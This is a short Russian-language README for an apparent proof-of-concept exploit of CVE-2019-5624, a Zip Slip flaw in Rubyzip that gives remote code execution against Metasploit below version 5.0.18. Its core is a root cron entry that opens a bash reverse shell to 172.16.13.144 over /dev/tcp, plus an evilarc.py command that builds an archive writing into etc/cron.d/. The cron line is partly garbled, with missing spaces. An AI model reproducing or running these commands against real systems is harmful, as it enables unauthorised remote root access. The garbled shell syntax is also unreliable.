
Доказательство концепции для уязвимости CVE-2019-5624 в Metasploit (небезопасная обработка ZIP-архивов в Rubyzip, приводящая к RCE)
Доказательство концепции для уязвимости CVE-2019-5624 в Metasploit (небезопасная обработка ZIP-архивов в Rubyzip с удалённым выполнением кода)
В феврале 2019 года я обнаружил новую уязвимость в библиотеке Rubyzip. Она позволяет злоумышленнику использовать небезопасную обработку ZIP-архивов (Zip Slip), что приводит к удалённому выполнению команд.
Эта уязвимость была использована для атак на все версии Metasploit ниже 5.0.18 Metasploit Wrap-Up
Я подготовил подробную запись в блоге, в которой объясняется эта уязвимость.
* * * * * root /bin/bash -c "exec /bin/bash0</dev/tcp/172.16.13.144/4444 1>&0 2>&0 0<&196;exec196<>/dev/tcp/172.16.13.144/4445; bash <&196 >&196 2>&196"
python evilarc.py exploit --os unix -p etc/cron.d/